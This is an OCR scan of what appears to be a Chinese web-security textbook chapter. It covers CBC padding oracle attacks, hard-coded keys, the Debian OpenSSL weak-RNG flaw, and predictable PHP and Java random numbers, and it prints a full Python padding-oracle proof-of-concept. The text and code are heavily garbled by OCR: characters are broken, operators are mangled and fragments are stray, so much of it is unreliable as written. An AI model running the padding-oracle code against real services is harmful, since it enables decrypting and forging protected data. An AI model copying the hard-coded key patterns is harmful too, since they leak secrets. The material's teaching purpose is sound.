— 为 24 个 字 节 ， 可 以 整除 8 而 不 能 整除 16， 因 此 可 以 很 快 判断 
出 分 组 的 长 度 应 该 为 8 个 字 节 。 
其 加 密 过 程 如 下 : 


BLOCK 1 of 2 BLOCK 2 of 2 


Initialization Vector 


Plain-Text (Padded) 


Intermediary Value (HEX) 


Encrypted Output (HEX) | oxzg8 | 0x51 | 0xD6 | OxCC | 0x68 0x95 | 0xÀ2 | Ox8E 


初始 化 向 量 IV 与 明文 YOR 后， 再 经 过 运算 得 到 的 结果 将 作为 新 的 IV， 
用 于 分 组 2 类 似 的 ， 解 密 过 程 如 下 : 。 


BLOCK 1 of 2 BLOCK 2 of 2 


4 


Encrypted Input (HEX) 0x95 | OxA2 | Ox8E | OxD4 | OxAA | OxC6 


V 


v 
Intermediary Value (HEX) 0x73 | 0x23 | 0x22 


Initialization Vector 


Plain-Text (Padded) 


VALID PADDING 


在 解密 完成 后 ， 如 果 最 后 的 padding 值 不 正确 ， 解 密 程 序 往往 会 抛 出 异 


^ (padding error) 。 而 利用 应 用 的 错误 回 显 ， 攻 击 者 往往 可 以 判断 出 
padding 是 否 正确 。 


过 


所 以 Padding Oracle 实 际 上 是 一 种 边 信 道 攻击 ， 攻 击 者 只 需要 知道 密 
的 解密 结果 是 否 正确 即 可 ， 而 这 往往 有 许多 途径 。 

比如 在 Web 应 用 中 ， 如 果 是 padding 不 正确 ， 则 应 用 程序 很 可 能 会 返回 
500 的 错误 ; 如果 padding 正 确 ， 但 解密 出 来 的 内 容 不 正确 ， 则 可 能 会 返 
回 200 的 目 定义 错误 。 那 么 ， 以 第 一 组 分 组 为 例 ， 构 造 IV 为 8 个 0 字 广 : 


Request: http://sampleapp/home. jsp? 
UID=0000000000000000F851D6CC68FC9537 
Response: 500 - Internal Server Error 


此 时 在 解密 时 padding 是 不 正确 的 。 


正确 的 padding 值 只 可 能 大 

1 个 字 节 的 padding 为 0x01 

2 个 字 节 的 padding 为 0x02,0x02 

3 个 字 节 的 padding 为 0x03,0x03,0x03 

4 个 字 节 的 padding 为 0x04,0x04,0x04,0x04 


因此 慢 慢 调整 IV 的 值 ， 以 希望 解密 后 ， 最 后 一 个 字 方 的 值 为 正确 的 
padding byte， 比 如 一 个 0x01。 


Request: http://sampleapp/home.jsp? 
UID-0000000000000001F851D6CC68FC9537 
Response: 500 - Internal Server Error 


逐步 调整 IV 的 值 : 


INVALID PADOINO 


为 Intermediary Value 是 固定 的 (我 们 此 时 不 知道 Intermediary Value 的 
值 是 多 少 ) ， 因 此 从 0x00 到 0xFF 之 则 ， 只 可 能 有 一 个 值 与 Intermedi-ary 


Value 的 最 后 一 个 字 节 进行 XOR 后 ， 结 果 是 0x01。 通 过 遍历 这 255 个 
值 ， 可 以 找 出 TV 需要 的 最 后 一 个 字 节 : 


Request: http://sampleapp/home. jsp? 
UID=000000000000003CF851D6CC68FC9537 
Response: 200 OK 


— = 
VALID PADOUG. 


通过 XOR 运 算 ， 可 以 马上 推导 出 此 Interme-diary Byte f& : 


If [Intermediary Byte] ^ 0x3C == 0x01, 
then [Intermediary Byte] == 0x3C ^ 0x01, 
so [Intermediary Byte] == 0x3D 


回 过 头 看 看 加 密 过 程 : 初始 化 向 量 IV 与 明文 进行 XOR 运 算得 到 了 
Intermediary Value， 因 此 将 刚才 得 到 的 Intermediary Byte: 0x3D 与 真实 
IV 的 最 后 一 个 字 节 0xOF 进 行 XOR 运 算 ， 既 能 得 到 明文 。 

0x32 是 2 的 十 六 进 制 形式 ， 正 好 是 明文 ! 

在 正确 匹配 了 padding“0x01” 后 ， 需 要 做 的 是 继续 推导 出 剩 下 的 
Intermediary Byte ° 根据 padding 的 标准 ， 当 需要 padding 两 个 字 方 时 ， 其 
值 应 该 为 0x02, 0x02。 而 我 们 已 经 知道 了 最 后 一 个 Intermediary Byte 为 
0x3D， 因 此 可 以 更 新 IV 的 第 8 个 字 节 为 0x3D ^ 0x02 = 0x3F， 此 时 可 以 
开始 遍历 IV 的 第 7 个 字 字 (0x00—-0xFF) ° 


mock fofi 


Hi si si sei oi =i E 


* 


388] STEMS, IVE 7 T SE B 2J0x24, DA Intermediary Byte 为 
UX26。 


四 ag 
mee ll =| 


获得 Intermediary Value 后 ， 通 过 与 原来 的 IV 进 行 XOR 运 算 ， 即 可 得 到 明 
文 。 在 这 个 过 程 中 ， 仪 仅 用 到 了 密 文 和 IV， 通 过 对 padding 的 推导 ， 即 
可 还 原 出 明文 ， 而 不 需要 知道 密 钥 是 什么 。 而 IV 并 不 需要 保密 ， 它 往 
往 是 以 明文 形式 发 送 的 。 

如 何 通过 Padding Oracle 使 得 密 文 能 够 解密 为 任意 明文 呢 ? 实际 上 通过 
前 面 的 解密 过 程 可 以 看 出 ， 通 过 改变 IV， 可 以 控制 整个 解密 过 程 。 
此 在 已 经 获得 了 Intermediary Value 的 情况 下 ， 很 快 束 可 以 通过 XOR 运 
算得 到 可 以 生成 任意 明文 的 IV。 


: Ev 
而 对 于 多 个 分 组 的 密 文 来 说 ， 从 最 后 一 组 密 文 开始 往 前 推 。 以 两 个 分 
组 为 例 ， 第 二 个 分 组 使 用 的 TV 是 第 一 个 分 组 的 密 文 (cipher text) ， 因 
此 当 推导 出 第 二 个 分 组 使 用 的 IV 时 ， 将 此 IV 值 当做 第 一 个 分 组 的 密 
文 ， 再 次 进行 推导 。 


ter inen PET) jm [|n mn mem n | n [ee | unn | m | ns | | nn] nn | nn 


et bs OI) | non | wens | mane | tns | 一 tare d 


一 - 二 


VALID raccewo 


多 分 组 的 密 文 可 以 依 此 类 推 ， 由 此 即 可 找到 解 


redistribute it and/or modify 

it under the terms of the GNU General 
Public License as published by 

the Free Software Foundation, either 
version 3 of the License, or 

(at your option) any later version. 

This program is distributed in the hope 
that it will be useful, 

but WITHOUT ANY WARRANTY; without even 
the implied warranty of 

MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the 

GNU General Public License for more 
details. 

You should have received a copy of the 
GNU General Public License 

along with this program. If not, see 
<http://www.gnu.org/licenses/>. 
"un 
import sys 
& https://www.dlitz.net/software/pycrypto/ 
from Crypto.Cipher import * 
import binascii 
4 the key for encrypt/decrypt 
4 we demo the poc here, so we need the key 
4 in real attack, you can trigger encrypt/ 
decrypt in a complete blackbox env 
ENCKEY - 'abcdefgh' 
def main(args): 


print 

print "--- Padding Oracle Attack POC(CBC- 
MODE) - 

print "=== by axis ===" 

print axis@ph4ntOm.org ===" 

print 2011.9 ===" 

print 


chimscsppsesussesessosnsininidicoicncccne 
# you may config this part by yourself 
iv = '12345678' 


plain = 'aaaaaaaaaaaaaaaaX' 

plain want - "opaas" 

# you can choose cipher: blowfish/AES/DES/ 
DES3/CAST/ARC2 

cipher - "blowfish" 


和 
block_size = 8 
i 


f cipher.lower() -- "aes": 
block size - 16 
if len(iv) !- block size: 


print "[-] IV must be 
"+str(block_size)+" bytes long(the same as 
block size)!" 
return False 
print "--- Generate Target Ciphertext ===" 
ciphertext - encrypt(plain, iv, cipher) 
if not ciphertext: 
print "[-] Encrypt Error!" 
return False 
print "[+] plaintext is: "+plain 
print "[+] iv is: "+hex_s(iv) 
print "[*] ciphertext is: "+ 
hex s(ciphertext) 
print 
print "--- Start Padding Oracle Decrypt 
print 
print "[*] Choosing Cipher: 
"+cipher .upper() 
guess = padding_oracle_decrypt(cipher, 
ciphertext, iv, block_size) 
if guess: 
print "[+] Guess intermediary value is: 
"+hex_s(guess["intermediary"] ) 
print "[+] plaintext = 
intermediary_value XOR original_Iv" 
print "[+] Guess plaintext is: 
"+guess["plaintext"] 
print 
if plain_want: 


print "--- Start Padding Oracle 
Encrypt ===" 
print "[*] plaintext want to encrypt 
is: "*plain want 
print "[*] Choosing Cipher: 
"+cipher .upper() 
en = padding_oracle_encrypt(cipher, 
ciphertext, plain_want, iv, block_size) 
if en: 
print "[+] Encrypt Success!" 
print "[+] The ciphertext you want 
is: "+hex_s(en[block_size:]) 
print "[+] IV is: 
"+hex_s(en[:block_size]) 
print 
print "=== Let's verify the custom 
encrypt result === 
print "[+] Decrypt of ciphertext '"+ 
hex_s(en[block_size:]) +"' is:" 
de = decrypt(en[block_size:], 
en[:block_size], cipher) 
if de == 
add_PKCS5_padding(plain_want, block_size): 
print de 
print "[+] Bingo!" 
else: 
print "[-] It seems something 
wrong happened!" 
return False 
return True 
else: 
return False 
def padding_oracle_encrypt(cipher, 
ciphertext, plaintext, iv, block size-8): 
# the last block 
guess cipher = ciphertext[0-block size:] 
plaintext - add PKCS5 padding(plaintext 
block size) 
print "[*] After padding, plaintext 
becomes to: "+hex_s(plaintext) 
print 
block - len(plaintext) 
iv nouse = iv # no use here, in fact we 
only need intermediary 
prev cipher = ciphertext[0-block size:] # 
init with the last cipher block 
while block » 60: 
# we need the intermediary value 
tmp - 
padding oracle decrypt block(cipher 
prev cipher, iv nouse, block size, 
debug-False) 
# calculate the iv, the iv is the 
ciphertext of the previous block 
prev cipher - xor str( plaintext[block- 
block size:block], tmp["intermediary"] ) 
#save result 
guess_cipher = prev_cipher + guess_cipher 
block = block - block_size 
return guess_cipher 
def padding_oracle_decrypt(cipher, 
ciphertext, iv, block_size=8, debug=True): 
# split cipher into blocks; we will 
manipulate ciphertext block by block 
cipher block = 
split cipher block(ciphertext, block size) 
if cipher block: 
result = {} 
result["intermediary"] - ' 
result["plaintext"] - '' 
counter - 0 
for c in cipher block: 
if debug: 
print "[*] Now try to decrypt block 
"+str(counter) 
print "[*] Block "+str(counter)+"'s 
ciphertext is: "+hex_s(c) 
print 
# padding oracle to each block 
guess = 
padding_oracle_decrypt_block(cipher, c, iv, 
block_size, debug) 
if guess: 
iv=c 
result["intermediary"] += 
guess["intermediary"] 
result["plaintext"] += 
guess["plaintext"] 
if debug: 
print 
print "[+] Block "+str(counter)+" 


decrypt!" 

print "[+] intermediary value is: 
"+hex_s(guess["intermediary"] ) 

print "[+] The plaintext of block 
"+str(counter)+" is: "+guess["plaintext"] 

print 


counter = counter+1 
else: 
print "[-] padding oracle decrypt 
error!" 
return False 
return result 
else: 
print "[-] ciphertext's block_size is 
incorrect!" 
return False 
def padding_oracle_decrypt_block(cipher, 
ciphertext, iv, block_size=8, debug=True): 
result = {} 
plain = '' 
intermediary = [] # list to save 
intermediary 
iv_p = [] # list to save the iv we found 
for i in range(1, block_size+1): 
iv try - [] 
iv p = change iv(iv p, intermediary, i) 
# construct iv 
# iv = Nx00...(several 0 bytes) + 
\xOe(the bruteforce byte) + \xdc...(the iv 
bytes 
we found) 
for k in range(0, block size-i): 
iv try.append(" x00") 
# bruteforce iv byte for padding oracle 
# 1 bytes to bruteforce, then append the 
rest bytes 
iv_try.append("\x00") 
for b in range(0,256): 
iv tmp - iv try 
iv tmp[len(iv tmp)-1] = chr(b) 
iv tmp s = ''.join("%s" % ch for ch in 
iv tmp) 
# append the result of iv, we've just 
calculate it, saved in iv p 
for p in range(0, len(iv p)): 
iv tmp s += iv p[len(iv p)-1-p] 
# in real attack, you have to replace 
this part to trigger the decrypt program 
4print hex s(iv tmp s) # for debug 
plain - decrypt(ciphertext, iv tmp s, 


cipher) 
4print hex s(plain) # for debug 
# got it! 


# in real attack, you have to replace 
this part to the padding error judgement 
if check PKCS5 padding(plain, i): 
if debug: 
print "[*] Try IV: 
"hex s(iv tmp s) 
print "[*] Found padding oracle: " 
* hex s(plain) 
iv p.append(chr(b)) 
intermediary.append(chr(b ^ i)) 
break 
plain = '' 
for ch in range(0, len(intermediary) ) : 
plain += 
chr( ord(intermediary[len(intermediary)-1- 
ch]) ^ ord(iv[ch]) ) 
result["plaintext"] - plain 
result["intermediary"] = ''.join("%s" 96 ch 
for ch in intermediary)[::-1] 
return result 
# save the iv bytes found by padding oracle 
into a list 
def change iv(iv p, intermediary, p): 
for i in range(0, len(iv p)): 
iv p[i] = chr( ord(intermediary[i]) ^ p) 
return iv p 
def split cipher block(ciphertext, 
block size-8): 
if len(ciphertext) % block size !- 0: 
return False 
result - [] 
length = 0 
while length < len(ciphertext): 
result.append(ciphertext[length:length 
*block size]) 
length += block size 
return result 
def check PKCS5 padding(plain, p): 
if len(plain) % 8 !- 0: 
return False 
# convert the string 
plain - plain[::-1] 
ch = 0 
found = 0 
while ch « p: 
if plain[ch] == chr(p): 
found += 1 
ch += 1 
if found -- 
return True 


else: 
return False 
def add PKCS5 padding(plaintext, block size): 
si"! 
if len(plaintext) % block_size == 
return plaintext 
if len(plaintext) < block_size: 
padding = block_size - len(plaintext) 
else: 
padding = block_size - (len(plaintext) % 
block_size) 
for i in range(0, padding): 
plaintext += chr(padding) 
return plaintext 
def decrypt(ciphertext, iv, cipher): 
# we only need the padding error itself, 


not the key 

# you may gain padding error info in other 
ways 

# in real attack, you may trigger decrypt 
program 


# a complete blackbox environment 
key = ENCKEY 


if cipher.lower() -- "des": 

0 = DES.new(key, DES.MODE CBC,iv) 
elif cipher.lower() -- "aes": 

0 = AES.new(key, AES.MODE CBC,iv) 
elif cipher.lower() -- "des3": 

0 = DES3.new(key, DES3.MODE_CBC, iv) 
elif cipher.lower() == "blowfish": 


o = Blowfish.new(key, 
Blowfish.MODE_CBC, iv) 
elif cipher.lower() == "cast": 
0 = CAST.new(key, CAST.MODE CBC, iv) 
elif cipher.lower() -- "arc2": 
0 = ARC2.new(key, ARC2.MODE CBC, iv) 
else: 
return False 
if len(iv) %8 !- 0: 
return False 
if len(ciphertext) % 8 != 0: 
return False 
return o.decrypt(ciphertext) 
def encrypt(plaintext, iv, cipher): 
key - ENCKEY 
if cipher.lower() -- "des": 
if len(key) !- 8: 
print "[-] DES key must be 8 bytes 


long!" 
return False 
0 = DES.new(key, DES.MODE CBC,iv) 
elif cipher.lower() -- "aes": 
if len(key) !- 16 and len(key) !- 24 and 
len(key) != 32: 
print "[-] AES key must be 16/24/32 
bytes long!" 
return False 
0 = AES.new(key, AES.MODE CBC,iv) 
elif cipher.lower() -- "des3": 
if len(key) !- 16: 
print "[-] Triple DES key must be 16 
bytes long!" 
return False 
0 = DES3.new(key, DES3.MODE_CBC, iv) 
elif cipher.lower() -- "blowfish": 
0 = Blowfish.new(key, 
Blowfish.MODE CBC,iv) 
elif cipher.lower() -- "cast": 
0 = CAST.new(key, CAST.MODE CBC, iv) 
elif cipher.lower() -- "arc2": 
0 = ARC2.new(key, ARC2.MODE CBC, iv) 
else: 
return False 
plaintext - add PKCS5 padding(plaintext 
len(iv)) 
return o.encrypt(plaintext) 
def xor str(a,b): 
if len(a) != len(b): 
return False 
e 201 
for i in range(0, len(a)): 
c *- chr( ord(a[i]) ^ ord(b[i]) ) 


return c 
def hex s(str): 
rez t 


for i in range(0, len(str)): 
re += "\\x"+binascii.b2a_hex(str[i]) 
return re 
if name -- " gain ": 
main(sys.argv) 


Padding Oracle Attack 的 关键 在 于 攻击 着 能 够 获知 解密 的 结果 是 否 14 
padding。 在 实现 和 使 用 CBC 模 式 的 分 组 加 密 算法 时 ， 注 意 这 一 


11.6 ZJEM 

在 密码 学 里 有 个 基本 的 原则 : 密码 系统 的 安全 性 应 该 依赖 于 密 钥 的 复 

杂 性 ， 而 不 应 该 依赖 于 算法 的 保密 性 。 

JH. ， 选 择 一 个 足够 安全 的 加 密 算 法 不 是 困难 的 事情 ， 难 的 
管理 。 在 一 皇 实 际 的 攻击 案例 中 ， 直接 攻击 加 密 算 法 本 身 的 案 

1 而 因为 密 钥 没有 妥善 管理 导致 的 安全 事件 却 很 多 。 对 于 攻击 

者 来 说 ， 他 们 不 需 如 果 能 够 通过 一 些 方法 获得 

HA, MEREEN ° 

密 钥 管理 中 最 种 见 的 错误 ， 束 是 将 密 钥 便 编 码 在 代码 里 。 比 如 下 面 这 

段 代 码 、 就 将 Hh 过 的 窗 色 价 编 码 在 代码 中 用 于 认证 


public boolean VerifyAdmin(String password) { 
af 


(password. equals("68af404b513073584c4b6f22 
b6c63e6b") ) 

System.out.println("Entering Diagnostic 
Mode..."); 

return true; 


System.out.println("Incorrect Password!"); 
return false; 


ee 签名 的 salt 等 “key” 硬 编码 在 代码 中 ， 是 非常 不 


File saveFile = new File("Settings.set"); 
saveFile.delete(); 
FileOutputStream fout - new 

FileOutputStream(saveFile); 

//Encrypt the settings 
//Generate a ke 
byte key[] = "My Encryption 
Key98" dE 
DESKeySpec desKeySpec - new 

DESKeySpec(key) ; 

SecretKeyFactory keyFactory - 
SecretKeyFactory.getInstance("DES"); 
ecretKey skey - 

keyFactory.generateSecret(desKeySpec); 
/Prepare the encrypter 
Cipher p dm = 

Cipher.getInstance("DES"); 
ecipher. RN S d UNE ENCRYPT MODE, 

skey); 

// Seal (encrypt) the object 
SealedObject so - new 

SealedObject(this, ecipher); 
ObjectOutputStream o - new 

ObjectOutputStream(fout); 
o.writeObject(so); 
o.close(); 


In DNE HUC Reip Mane 


function 人 eye 人 

$merId = $th 
»getConf(Spaynent[ M OrderId'], 
'member id' D // 账 号 


$pKey = $this 
>getConf (Spayment[ M OrderId'], 
'PrivateKey'); 

$key - 
$pKey--''?'afsvq2mqwc7j0i69uzvukqexrzd0jq6 
h' :$pKey;// 私 钥 值 

$ret url = $this-»callbackUrl; 

$server url = $this- 5serverCallbackUrl; 


硬 编码 的 密 钥 ， 在 以 下 几 种 情况 下 可 能 被 泄露 。 


一 是 代码 被 广泛 传播 。 这 种 泄露 途径 常见 于 一 些 开 源 软件 ， 有 的 商业 
软件 并 不 开源 ， 但 编译 后 的 二 进 制 文件 被 用 户 下载 ， 也 可 能 被 逆向 工 
程 反 编 译 后 ， 泄 露 硬 编码 的 密 钥 。 

二 是 软件 开发 团队 的 成 员 都 能 查看 代码 ， 从 而 获知 硬 编码 的 密 钥 。 开 
发 团队 的 成 员 如 果 流 动 性 较 大 ， 则 可 能 会 由 此 泄露 代码 。 

对 于 第 一 种 情况 ， 如 果 一 定 要 将 密 钥 硬 编码 在 代码 中 ， 我 们 尚 可 通过 
Diffie-Hellman 交 换 密 钥 体系 ， 生 成 公私 钥 来 完成 密 钥 的 分 发 ， 而 对 于 
第 二 种 情况 ， 则 只 能 通过 改善 密 钥 管 理 来 保护 密 钥 。 

对 于 Web 应 用 来 说 ， 常 见 的 做 法 是 将 密 钥 (包括 密码 ) 保存 在 配置 文 
件 或 者 数据 库 中 ， 在 使 用 时 由 程序 读 出 密 钥 并 加 载 进 内 存 。 密 钥 所 在 
的 配置 文件 或 数据 库 需 要 严格 的 控制 访问 权限 ， 同 时 也 要 确保 运 维 或 
DBA 中 具有 访问 权限 的 人 越 少 越 好 。 

在 应 用 发 布 到 生产 环境 时 ， 需 要 重新 生成 新 的 密 钥 或 密码 ， 以 免 与 测 
试 环境 中 使 用 的 密 钥 相同 。 

当 黑 客 已 经 入 侵 之 后 ， 密 钥 管 理 系 统 也 难以 保证 密 钥 的 安全 性 。 比 如 
攻击 者 获取 了 一 个 web-shell， 那 么 攻击 者 也 就 具备 了 应 用 程序 的 一 切 
权限 。 由 于 正常 的 应 用 程序 也 需要 使 用 密 钥 ， 因 此 对 密 钥 的 控制 不 可 
能 限制 住 webshell 的 “正常 ?请求 。 

密 钥 管 理 的 主要 目的 ， 还 是 为 了 防止 密 钥 从 非 正 常 的 渠道 泄露 。 定 期 
更 换 密 钥 也 是 一 种 有 效 的 做 法 。 一 个 比较 安全 的 密 钥 管理 系统 ， 可 以 
将 所 有 的 密 钥 (包括 一 些 敏感 配置 文件 ) 都 集中 保存 在 一 个 服务 器 
(集群 ) 上 ， 并 通过 Web Service 的 方式 提供 获取 密 钥 的 API。 每 个 Web 
应 用 在 需要 使 用 密 钥 时 ， 通 过 带 认证 信息 的 API 请 求 密 钥 管 理 系 统 ， 
动态 获取 密 钥 。Web 应 用 不 能 把 密 钥 写 入 本 地 文件 中 ， 只 加 载 到 内 
存 ， 这 样 动态 获取 密 钥 最 大 程度 地 保护 了 密 钥 的 私密 性 。 密 钥 集 中 管 
理 ， 降 低 了 系统 对 于 密 钥 的 耦合 性 ， 也 有 利于 定期 更 换 密 钥 。 


11.7 伪 随 机 数 问题 

伪 随 机 数 (pseudo random number) 问题 一 伪 随 机 数 不 够 随机 ， 是 程 
序 开发 中 会 出 现 的 一 个 问题 。 一 方面 ， 大 多 aia ee ae 
知识 有 所 人 欠缺， 很 容易 写 出 不 安全 的 代码 ， 男 一 方面 ， 伪 随机 数 问 题 
的 攻击 方式 在 多 数 情况 下 都 只 存在 于 理论 中 ， “难以 证 衣 ， 因此 在 说 服 
程序 员 修补 代码 时 也 显得 有 点 理由 不 够 充分 。 

BAREN E 真实 存在 的 、 不 可 忽视 的 一 个 安全 问题 。 伪 随机 
数 ， 是 通过 一 些 数学 算法 生成 的 随机 数 ， 并 非 真 正 的 随机 数 。 密 码 学 
上 的 安全 伪 随 机 数 应 该 是 不 可 压缩 的 。 对 应 的 “ 真 随机 数 ”， 则 是 通过 
一 些 物理 系统 生成 的 随机 数 ， 比 如 电压 的 波动 、 硬盘 磁头 读 / 写 时 的 寻 
道 时 间 、 空 中 电磁 波 的 噪声 等 。 

11.7.1 ” 弱 伪 随机 数 的 麻烦 

2008 年 5 月 13 日 ，Luciano Bello 发 现 了 De-bian 上 的 OpenSSL 包 中 存在 弱 
伪 随 机 数 算法 。 

产生 这 个 问题 的 原因 ， 是 由 于 编译 时 会 产生 警告 warning) 信息 ， 
此 下 面 的 代码 被 移 除 了 。 


MD_Update(&m, buf, j); 


MD Update(&m,buf,j); /* purify complains */ 


这 直接 导致 的 后 果 是 ， 在 OpenSSL 的 伪 随 机 数 生 成 算法 中 ， 唯 一 的 随 
机 因子 是 pid。 而 在 Linux 系 统 中 ，pid 的 最 大 值 也 是 32768。 这 是 一 个 很 
小 的 范围 ， 因 此 可 以 很 快 地 遇 历 出 所 有 的 随机 数 。 受 到 影响 的 有 ， 从 
2006.9 到 2008.5.13 的 debian 平 台 上 生成 的 所 有 ssh key 的 个 数 是 有 限 的 ， 
都 是 可 以 遇 历 出 来 的 ， 这 是 一 个 非常 严重 的 漏洞 。 同 时 受到 影响 的 还 
有 OpenSSL 生 成 的 key 以 及 OpenVPN 生 成 的 key。 


Vendor Tools 


- OpenSSL Kev Blacklist 
- OpenSSH Ke ckli 
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大 ， 也 让 更 多 的 开发 者 开始 关注 伪 随 机 数 的 安全 问题 。 

再 看 看 下 面 这 个 例子 。 在 Sun Java 6 Update11l 之 前 的 createTempFile() 中 
存在 一 个 随机 数 可 预测 的 问题 ， 在 短 时 间 内 生成 的 随机 数 实际 上 是 顺 
序 增长 的 。Chris Eng J Ts 


iu T ateTempFile(deploymentNa 
extension) 


此 函数 用 于 生成 临时 目录 ， 其 实现 代码 如 下 : 


private static File generateFile(String s, 
String s1, File file 

throws IOException 
{ 


if(counter == -1 
counter = (new 
Random()).nextInt() & Oxffff; 
counter++; 
return new File(file, (new 
StringBuilder()).append(s).append(Integer.toS 
tring(counter)).append(s1).toString()); 


public static File createTempFile(String s, 
String s1, File file 

throws IOException 
{ 


File file1; 
do 
file1 = generateFile(s, s2, file); 
while(!checkAndCreate(filei.getPath(), 
securitymanager)); 
return filet; 
J 


在 Linux 上 的 测试 结果 如 下 : 


文件 名 按照 顺序 生成 


文件 名 按照 顺序 生成 (BE) 
可 以 看 到 文件 名 是 顺序 增长 的 。 
在 Windows 上 ， 本 质 没 有 发 生变 化 : 
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文件 名 按照 顺序 生成 
元 整 测试 代码 如 下 : 


import java.io.*; 
public. class detfenb £ 
/* 


* Gparam args 
SUE static void main(String[] args) { 
// TODO Auto-generated method stub 
File f - null 
String extension - ".tmp"; 
try { 
//for (int i-0; i<10; i++){ 
File.createTempFile("temp", extension); 
System.out.println(f.getPath()); 
} 
catch (IOException e) { 
} 


} 
} 


这 个 函数 经 钊 被 用 于 生成 临时 文件 。 如 果 临 时 文件 可 以 被 预测 ， 那 么 
根据 业务 逻辑 的 不 同 ， 将 导致 各 种 不 可 预 售 的 结 采 ， 产 重 的 将 导致 系 
统 被 破坏 ， 或 者 为 攻击 者 打开 大 | ]。 

在 官方 解决 方案 中 ， 一 方面 增 大 了 随机 数 的 空间 ， 另 一 方面 修补 了 顺 
序 增长 的 问题 。 


private static File generateFile(String s, 
String s1, File file) 
throws IOException 


LazyInitialization. random.nextLong(); 
if(l == 0x8000000000000000L ) 
l= OL; 


else 
1 = Math.abs(1); 
return new File(file, (new 
StringBuilder()).append(s).append(Long.toStri 
ng(1)).append(s1).toString()); 
} 
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法 生成 的 。 


11.7.2 ”时 间 真 的 随机 吗 

很 多 伪 随 机 数 算法 与 系统 时 间 有 关 ， 而 有 的 程序 员 甚 至 就 直接 使 用 系 
统 时 间 代 蔡 随机 数 的 生成 。 这 样 生成 的 随机 数 ， 是 根据 时 间 顺 序 增长 
的 ， 可 以 从 时 间 上 进行 预测 ， 从 而 存在 安全 隐患 。 

比如 下 面 这 段 代 码 ， ee 是 用 户 取 回 密码 时 ， 会 由 系统 随机 生成 一 
个 新 的 密码 ， 并 发 送 到 用 户 邮箱 。 


function sendPSw(){ 


$messenger = &$this->system- 
>loadModel(' aM ee );echo 
microtime()."«br/» 


substr(md5(print r(microtime(),true)),0,6) 


文 个 新 生成 的 $passwd， 是 直接 调用 了 micro-time() 后 ， 取 其 MD5 值 的 
前 6 位 。 由 于 MD5 算 法 是 单 癌 的 哈 希 函数 ， 因 此 只 \ 害 要 台历 microtime0 


的 值 ， 再 按照 同样 的 算法 ， 即 可 猜 解 出 $passwd 的 值 


PHP 中 的 microtimeO 由 两 个 值 合并 而 成 ， 一 个 是 微 秒 数 ， 一 个 是 
当前 秒 数 。 因 此 只 需要 获取 到 服务 右 的 系统 时 间 ， 就 可 以 以 此 时 


是 系统 
[8] 3 


基数 ， 按 次 序 递 增 ， 即 可 猜 解 出 新 生成 的 密码 。 因 此 这 个 算法 是 存在 
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在 这 个 案例 中 ， 生 成 密码 的 前 一 行 ， 直接 调用 了 microtime() 并 返 
当前 页 面 上 ， 这 又 使 得 攻击 者 以 非常 低 的 成 本 获得 了 服务 器 时 间 | 
两 次 调用 microtime0 的 时 间 间 隅 非常 短 ， 因 此 必然 是 在 同一 秒 内 ， 
EERE SEREEN o 最终 成 功 的 实施 攻击 结果 如 下 


成 功 预 测 出 密码 值 


非常 严重 的 设计 缺陷 的 ， 程 序 员 预想 的 随机 生成 密码 ， 其 实 并 未 随 


可 在 
且 
攻 


所 以 ， 在 开发 程序 时 ， 要 切记 : 不 要 把 时 间 函 数 当成 随机 数 使 用 。 


11.7.3 破解 伪 随 机 数 算法 的 种 子 
在 PHP 中 ， 常 用 的 随机 数 生 成 算法 有 rand()、mt_rand()。 这 两 个 玉 
最 大 范围 分 别 为 : 


«?php 
//on windows 


数 的 


print getrandmax();// 32767 
print mt getrandmax(); //2147483647 
?» 


可 见 ，rand0 的 范围 其 实 是 非常 小 的 ， 如 果 使 用 rand0 生 成 的 随机 数 用 

于 一 些 重要 的 地 方 ， 则 会 非常 危险 。 

其 实 PHP 中 的 mt rand0 也 不 是 很 安全 ，Ste-fan Esser 在 他 著名 的 

paper: “mt_srand and notso random numbers” fe ii SPHPHI AREAL 

数 mt_rand0 在 实现 上 的 一 些 缺 陷 。 

伪 随 机 数 是 由 数学 算法 实现 的 ， 它 真正 随机 的 地 方 在 于 “种 子 
(seed) ”。 种 子 一 旦 确定 后 ， 再 通过 同一 伪 随 机 数 算法 计算 出 来 的 随 

机 数 ， 其 值 是 固定 的 ， 多 次 计算 所 得 值 的 顺序 也 是 固定 的 。 

在 PHP 4.2.0 之 前 的 版 本 中 ， 是 需要 通过 srand() 或 mt_srand() 给 rand()、 

mt_rand0 播 种 的 : 在 PHP 4.2.0 之 后 的 版 本 中 不 再 需要 事先 通过 

srand()、mt_srand() 播 种 。 比 如 直接 调用 mt_rand()， 系 统 会 自动 播种 。 

但 为 了 和 以 前 版 本 兼容 ，PHP 应 用 代码 里 经 常会 这 样 写 : 


mt srand(time()); 
mt srand((double) microtime() * 100000); 
mt srand((double) microtime() * 1000000); 


这 种 播种 的 写法 其 实 是 有 缺陷 的 ， 且 不 说 time0 是 可 以 被 攻击 者 获知 
的 ， 使 用 microtime0O 获 得 的 种 子 范围 其 实 也 不 是 很 大 。 比 如 : 


> O0«(double) 


O«(double) microtime()<1 --- 
microtime()* 1000000<1000000 


变化 的 范围 在 0 到 1000000 之 间 ， 猜 解 100 万 次 即 可 遍历 出 所 有 的 种 子 。 


在 PHP 4.2.0 之 后 的 版 本 中 ， 如 果 没 有 通过 播种 函数 指定 seed， 而 直接 
调用 mt _ rand0， 则 系统 会 分 配 一 个 默认 的 种 子 。 在 32 位 系统 上 默认 的 
播种 的 种 子 最 大 值 是 2*32， 因 此 最 多 只 需要 尝试 2^*32 次 就 可 以 破解 
seed ° 

在 Stefan Esser 的 文中 还 提 到 ， 如 果 是 在 同一 个 进程 中 ， 则 同一 个 seed 
每 次 通过 mt_rand0 生 成 的 值 都 是 固定 的 。 比 如 如 下 代码 : 


p 
sran 
m 


di 


(1 
ran 


33535353 3 
Ct ct et ct ct e ct 
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Sa 535 4 5 
ppm pmo 
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ooooococcdo 
——————-— 
AAAAAAA 
OOOOOCOO 
33333533 
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3000000034. 
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( 
( 

( 
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( 

( 
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第 一 次 访问 的 结 采 如 下 : 


c ) www, 8. << 


多 次 访问 也 得 到 同样 结果 : 


em 
| £v up sep emo IRD Why 
AORA Bitte Mewes constant phe 


可 以 看 出 ， 当 seed 确 定时 ， 第 一 次 到 第 n 次 通过 mt_rand0 产 生 的 值 都 没 
有 发 生变 化 。 


建立 在 这 个 基础 上 ， 就 可 以 得 到 一 种 可 行 的 攻击 方式 : 


(1) 通过 一 些 方法 猜 解 出 种 子 的 值 ; 
(2) ie D 
